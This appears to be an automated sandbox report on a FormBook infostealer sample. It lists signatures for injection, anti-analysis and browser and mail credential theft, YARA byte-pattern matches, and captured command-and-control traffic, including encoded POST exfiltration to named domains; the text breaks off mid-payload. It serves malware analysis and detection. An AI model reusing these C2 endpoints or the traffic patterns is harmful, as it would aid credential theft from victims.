Loading ...

Play interactive tourEdit tour

Analysis Report 111.exe

Overview

General Information

Sample Name:111.exe
Analysis ID:285531
MD5:3fd09f6ed3d2a520ce8924040743247f
SHA1:e89fd03bb21bbb0c8d2069ee645e7bdcf22a7120
SHA256:c8c3a7a2e1be4e07f00da05dafab7db5e71dee2bdecf834d94579044bb53acfe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hijacks the control flow in another process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 111.exe (PID: 4168 cmdline: 'C:\Users\user\Desktop\111.exe' MD5: 3FD09F6ED3D2A520CE8924040743247F)
    • rundll32.exe (PID: 4160 cmdline: rundll32.exe EncoreSlipway,Breathing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 4828 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autoconv.exe (PID: 776 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
          • cmd.exe (PID: 4692 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cmd.exe (PID: 6104 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • t4nhyl7po.exe (PID: 1356 cmdline: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18349:$sqlite3step: 68 34 1C 7B E1
    • 0x1845c:$sqlite3step: 68 34 1C 7B E1
    • 0x18378:$sqlite3text: 68 38 2A 90 C5
    • 0x1849d:$sqlite3text: 68 38 2A 90 C5
    • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.cmd.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.cmd.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.cmd.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17549:$sqlite3step: 68 34 1C 7B E1
        • 0x1765c:$sqlite3step: 68 34 1C 7B E1
        • 0x17578:$sqlite3text: 68 38 2A 90 C5
        • 0x1769d:$sqlite3text: 68 38 2A 90 C5
        • 0x1758b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x176b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.cmd.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.cmd.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.glowtey.comVirustotal: Detection: 7%Perma Link
          Source: http://www.glowtey.comVirustotal: Detection: 7%Perma Link
          Source: http://www.glowtey.com/c233/Virustotal: Detection: 6%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 111.exeJoe Sandbox ML: detected
          Source: 2.2.cmd.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_00406469 FindFirstFileA,FindClose,0_2_00406469
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040592E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011E31DC FindFirstFileW,FindNextFileW,FindClose,8_2_011E31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_011C85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011D245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,8_2_011D245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,8_2_011CB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011D68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,8_2_011D68BA
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E4245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,24_2_00E4245C
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E468BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,24_2_00E468BA
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,24_2_00E3B89C
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E385EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,24_2_00E385EA
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E531DC FindFirstFileW,FindNextFileW,FindClose,24_2_00E531DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop esi2_2_0041721F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop esi2_2_0041728F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop esi2_2_004172AD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi2_2_0040E404

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49721
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49747
          Source: global trafficHTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=dIUL4aEnqVztNkxGFBfGGDue4kuBNJsB41nCN9+lFBZzP9N/eKcd9EC4aoHiD0dIecD5 HTTP/1.1Host: www.lumenhealthandwellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?jDHtm=Vp47q3jWYtxCpR5shwdOI9jgrSmWH0DOE+Ng17hSC+D0xjvv9TnN74PiV/E2XVvfy3Xi&BZ=LhqLWrh8d HTTP/1.1Host: www.affilexample6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?jDHtm=rdruXmMsrmfjr75N4q96R5zwpwpkQvpMYoXExK0gOkKL6uUWfKzmipBUu891EQIUthqV&BZ=LhqLWrh8d HTTP/1.1Host: www.rupanaa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=s9hIiY7EReOz2YwSLEQgOYezP1CImGsGkvwaaSfHWOStV9vruWPCpNUbWVdjWjx9llcz HTTP/1.1Host: www.henesymarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=P8W3Nhn/1wjuMbzQba9+Xkz0GoP3aEAwMmdFYv2f3Jxjf1tYZvWbX1Aq0R+IaCaFN+Nd HTTP/1.1Host: www.advincicode.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?jDHtm=clGH/XTlxIJgHxW4vaAZWA4KzODjpt9B0W6pMNoX4XRhNITn5jiOBWXD3dHeyDpJteiJ&BZ=LhqLWrh8d HTTP/1.1Host: www.glowtey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c233/?BZ=LhqLWrh8d&jDHtm=NoL+4mltcJVtmaVUQntK+GB5xrEZLMxxCS0mBWv5U5hjZvn1kv6Rpm3ggpYoYEtVjIy6 HTTP/1.1Host: www.ecoapiaryfarms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.affilexample6.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.affilexample6.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.affilexample6.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 64 4c 30 42 30 51 72 78 57 63 45 7a 31 6d 6b 44 30 55 4e 56 51 59 37 7a 74 42 47 46 47 6e 72 77 64 71 49 78 78 4d 68 35 47 75 4c 6c 38 41 4b 5f 30 78 4b 6b 79 49 7a 69 48 70 41 6d 53 6d 36 4e 6a 53 72 62 55 32 58 44 53 59 6e 49 4b 71 64 5a 79 69 42 41 6e 47 72 45 36 74 55 45 59 30 4c 68 49 77 66 6a 33 45 68 4e 7e 56 51 36 32 56 35 32 53 65 56 4b 65 72 73 42 62 71 6c 49 38 54 31 75 68 42 70 64 4b 33 55 37 5a 30 65 53 67 5f 72 73 74 39 53 51 77 65 4b 4a 36 79 38 53 54 6d 47 41 39 34 6f 73 38 79 7e 4b 45 6c 4e 2d 79 78 48 61 4f 30 58 44 42 6d 6c 42 4d 64 43 70 7a 6a 42 4b 31 48 74 56 48 4c 44 41 4c 58 79 31 41 2d 77 74 4c 48 31 57 38 56 7a 65 42 45 67 72 6f 76 4d 5a 46 4e 31 61 59 42 78 4b 47 75 6e 46 6c 36 6b 6c 63 59 48 78 34 56 67 75 31 45 57 51 34 39 39 39 63 32 39 35 37 44 6c 38 6a 4f 64 76 71 69 6c 33 39 58 54 4d 77 6e 53 62 52 4d 68 74 74 78 54 55 4c 4b 6a 56 6d 76 50 54 68 7a 5a 43 47 32 49 79 79 73 5a 77 53 58 34 57 70 45 31 39 30 68 4f 57 6e 2d 6a 41 58 57 4f 62 58 50 69 45 6f 49 45 69 53 54 6a 75 67 47 78 37 6d 4b 66 73 68 4f 6e 53 51 77 66 4e 61 43 59 6c 28 62 68 62 4e 74 69 5f 41 30 79 67 37 76 59 59 38 58 28 4d 58 4d 47 5a 28 59 6d 63 54 71 33 6c 7a 47 4b 79 69 50 39 64 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHtm=dL0B0QrxWcEz1mkD0UNVQY7ztBGFGnrwdqIxxMh5GuLl8AK_0xKkyIziHpAmSm6NjSrbU2XDSYnIKqdZyiBAnGrE6tUEY0LhIwfj3EhN~VQ62V52SeVKersBbqlI8T1uhBpdK3U7Z0eSg_rst9SQweKJ6y8STmGA94os8y~KElN-yxHaO0XDBmlBMdCpzjBK1HtVHLDALXy1A-wtLH1W8VzeBEgrovMZFN1aYBxKGunFl6klcYHx4Vgu1EWQ4999c2957Dl8jOdvqil39XTMwnSbRMhttxTULKjVmvPThzZCG2IyysZwSX4WpE190hOWn-jAXWObXPiEoIEiSTjugGx7mKfshOnSQwfNaCYl(bhbNti_A0yg7vYY8X(MXMGZ(YmcTq3lzGKyiP9dAg).
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.affilexample6.comConnection: closeContent-Length: 185415Cache-Control: no-cacheOrigin: http://www.affilexample6.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.affilexample6.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 64 4c 30 42 30 52 54 6c 46 61 5a 72 78 51 4d 43 37 6b 63 59 55 5a 4c 6c 38 54 53 61 53 45 36 4a 42 49 4d 62 78 4d 78 39 54 62 58 4a 37 67 36 5f 79 79 69 6a 78 59 7a 6a 58 5a 41 70 45 57 48 36 71 68 72 54 55 33 53 6b 53 59 76 50 66 35 31 63 38 53 41 57 6d 6d 6e 34 79 4e 70 51 59 32 75 4a 4c 53 54 46 79 46 64 4e 36 6c 49 30 79 30 70 68 46 76 70 46 51 36 55 41 49 72 4d 4c 37 67 41 58 6e 6a 56 72 4e 32 49 35 55 6e 43 46 76 63 69 35 37 4f 43 6c 30 4f 65 43 35 31 55 4e 4e 78 57 4d 38 36 51 6b 35 7a 7e 56 4b 31 6c 67 6b 68 58 53 59 6c 6a 55 44 56 74 37 4d 63 61 54 35 32 4a 62 69 52 31 4e 46 2d 7a 36 66 31 65 33 45 50 77 31 50 46 64 64 7e 57 72 78 5a 41 6c 75 37 50 68 62 41 50 39 73 62 67 35 78 45 61 33 42 39 62 56 51 52 72 71 39 77 30 77 42 28 6d 32 48 6a 2d 46 31 62 77 74 54 31 44 6c 58 6c 4f 64 5a 7e 79 45 49 77 45 28 58 67 33 69 6d 53 4e 70 2d 75 69 48 50 4d 49 58 5a 69 4f 6e 4f 6b 44 6c 65 49 6e 34 67 32 4b 68 6e 45 52 63 79 71 45 31 6d 30 69 6d 4e 6e 2d 6a 36 58 58 4f 39 57 36 4b 45 71 59 6b 78 53 77 62 63 70 6d 78 71 6e 62 76 75 71 64 7a 34 51 77 48 4e 62 32 51 66 39 73 39 62 4a 2d 71 2d 41 56 79 67 39 66 59 59 70 48 7e 6a 5a 5a 76 49 30 37 57 6a 61 35 65 61 73 6d 71 67 6d 2d 51 4b 45 30 41 6d 55 41 35 6a 6b 47 62 31 33 55 44 79 34 70 75 36 41 66 4a 54 57 57 71 74 31 7a 49 6f 74 30 32 51 78 37 7a 61 63 5f 68 39 6c 50 73 2d 71 69 77 6a 62 41 72 4c 77 54 4c 70 7a 64 7a 78 34 4b 78 4f 4d 38 65 56 4c 35 64 48 30 54 6b 77 36 31 50 62 59 74 78 70 7a 34 62 56 52 32 56 4c 48 34 51 65 58 41 73 4b 62 64 53 30 6c 68 79 54 71 35 57 77 49 2d 50 79 7e 52 53 6b 42 47 77 78 57 49 5a 58 41 67 7e 32 42 6b 7e 74 61 6d 67 78 57 31 33 67 32 4c 6e 38 38 6c 53 6c 72 6f 38 4f 33 42 64 43 67 67 48 51 77 48 65 6f 5a 66 74 6e 42 4d 65 49 44 48 61 54 64 4a 67 58 51 44 56 46 6d 39 38 4d 57 4d 65 74 76 32 48 75 32 59 33 6b 7e 6b 52 42 66 53 58 32 37 64 41 77 4c 4d 53 69 69 78 6c 4f 6b 6d 34 46 34 4d 47 4a 4d 63 64 68 48 4a 38 73 54 6f 59 58 68 73 69 34 32 2d 59 4a 35 56 34 61 42 44 64 30 58 32 71 4c 36 6b 39 34 45 52 69 5f 7a 63 41 4b 67 39 4c 30 74 5a 6c 56 62 37 44 6d 7a 68 45 7a 5a 35 77 52 4c 45 55 6d 7a 72 62 30 33 64 74 6d 7a 6f 55 57 44 4d 57 4c 50 47 6e 43 67 4d 28 57 53 32 67 68 6c 6f 37 32 6d 32 55 55 33 37 66 6c 38 36 78 4b 77 46 39 55 5a 54 6c 6e 44 4f 51 56 4f 70 59 52 35 56 69 34 7a 4d 6f 42 64 55 57 42 39 5a 37 56 7e 51 55 79 43 54 7a 61 50 2d 47 63 34 74 73 4a 51 77 33 71 4b 33 7a 69 6c 47 70 4f 34 79 65 59 54 36 59 56 37 66 4c 4d 6b 46 30 49 55 50 39 6b 30 63 45 39 77 6e 41 54 74 64 4a 69 55 5f 73 45 74 48 32 4a 65 4f 65 56 61 34 68
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.rupanaa.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.rupanaa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rupanaa.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 6a 5f 6e 55 4a 47 77 66 68 46 54 69 7a 36 45 43 6f 66 49 4d 44 4d 6a 58 76 6c 52 77 47 50 34 4c 4a 73 43 5f 69 74 38 6a 48 48 53 31 28 5f 41 67 52 71 75 56 6b 4a 4d 71 74 4e 6c 70 45 41 6f 36 36 56 72 61 42 4a 4e 31 65 48 73 4f 57 4f 47 44 56 41 69 58 47 4c 4e 50 71 7a 6b 6b 66 4d 6c 55 32 44 43 35 65 79 28 6a 67 4f 31 4f 68 5a 45 52 4b 7a 54 69 74 4c 66 6d 55 73 45 34 44 76 4d 56 6b 58 4b 74 59 64 4f 50 56 77 43 73 39 65 69 7a 77 41 6c 47 34 2d 4a 63 70 63 75 50 67 7a 36 42 73 79 77 37 59 54 52 67 76 46 4c 62 54 57 6f 7a 50 47 52 44 33 49 67 55 52 74 7e 4a 28 71 59 62 53 51 4b 6f 4a 57 69 67 41 66 6c 4f 4d 36 76 69 6b 4c 6a 4d 50 5a 74 6b 63 56 48 33 57 75 66 5a 64 34 33 37 74 6c 74 4d 50 57 6b 50 53 36 78 67 64 52 30 34 68 61 4a 4b 51 71 56 43 47 46 4b 6e 37 62 4f 44 39 6f 6b 4b 73 76 35 76 57 35 32 31 33 42 47 68 6e 34 28 78 4d 46 79 67 4d 54 48 45 61 34 68 44 66 31 6c 32 61 4b 46 37 47 6e 50 33 47 76 63 73 72 33 28 6b 79 45 32 6c 57 54 44 57 52 68 50 32 42 51 7a 67 4b 66 7e 41 75 55 66 4e 51 65 61 2d 34 75 7e 37 44 54 71 4f 45 77 76 47 37 70 30 6e 44 78 33 67 6c 38 6e 4c 43 79 65 32 4c 6d 59 37 50 4e 6c 33 66 54 6e 6e 78 49 33 54 6e 31 48 36 38 41 46 39 6b 4d 65 33 42 68 55 72 75 67 29 2e 00 63 54 71 33 6c 7a 47 Data Ascii: jDHtm=j_nUJGwfhFTiz6ECofIMDMjXvlRwGP4LJsC_it8jHHS1(_AgRquVkJMqtNlpEAo66VraBJN1eHsOWOGDVAiXGLNPqzkkfMlU2DC5ey(jgO1OhZERKzTitLfmUsE4DvMVkXKtYdOPVwCs9eizwAlG4-JcpcuPgz6Bsyw7YTRgvFLbTWozPGRD3IgURt~J(qYbSQKoJWigAflOM6vikLjMPZtkcVH3WufZd437tltMPWkPS6xgdR04haJKQqVCGFKn7bOD9okKsv5vW5213BGhn4(xMFygMTHEa4hDf1l2aKF7GnP3Gvcsr3(kyE2lWTDWRhP2BQzgKf~AuUfNQea-4u~7DTqOEwvG7p0nDx3gl8nLCye2LmY7PNl3fTnnxI3Tn1H68AF9kMe3BhUrug).cTq3lzG
          Source: global trafficHTTP traffic detected: POST /c233/ HTTP/1.1Host: www.rupanaa.comConnection: closeContent-Length: 185415Cache-Control: no-cacheOrigin: http://www.rupanaa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rupanaa.com/c233/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 74 6d 3d 6a 5f 6e 55 4a 43 73 4c 6e 31 58 7a 33 4d 38 48 6f 50 59 79 48 4e 53 51 7e 79 6f 30 51 4e 35 79 4b 2d 47 56 69 74 73 6e 65 32 43 6a 31 2d 51 67 58 76 36 65 77 35 4d 70 36 64 6c 75 41 41 6c 44 33 6e 71 58 42 49 5a 4c 65 48 6b 50 59 74 65 4b 56 51 69 41 47 72 42 7a 39 6e 4e 34 66 4e 56 78 32 6e 6e 71 62 79 44 6a 74 65 4e 4d 6b 34 56 44 50 79 66 6e 71 4c 44 70 57 75 46 6f 44 64 4a 38 6b 79 71 62 51 39 7e 4e 43 78 47 37 68 4e 37 65 6a 42 74 64 79 50 35 52 33 72 4f 51 75 30 53 4e 74 33 51 4e 58 79 52 6a 6e 55 6a 5a 59 46 41 56 66 6a 78 51 31 59 52 6e 52 71 71 7a 79 5f 52 56 42 48 71 77 4d 6d 43 4b 59 62 39 49 4f 49 48 71 7a 59 47 36 41 35 39 4c 65 52 4c 77 54 2d 7a 49 65 36 28 72 6a 67 42 33 44 48 59 44 5a 75 31 59 51 69 59 77 7e 4b 5a 31 61 4c 64 52 49 78 7e 5f 38 59 28 67 35 49 6c 73 71 66 35 6a 64 61 75 6b 7a 7a 71 2d 69 37 58 49 42 6d 6a 36 4d 41 7a 62 5a 39 34 63 52 33 56 6e 5a 36 4a 33 65 48 28 50 43 4d 77 33 73 41 33 39 73 55 32 6d 57 56 28 52 52 68 50 45 42 52 7a 4b 59 61 65 41 75 41 53 52 53 5f 61 79 7a 4f 7e 32 4e 6a 36 49 4b 6a 47 5a 37 70 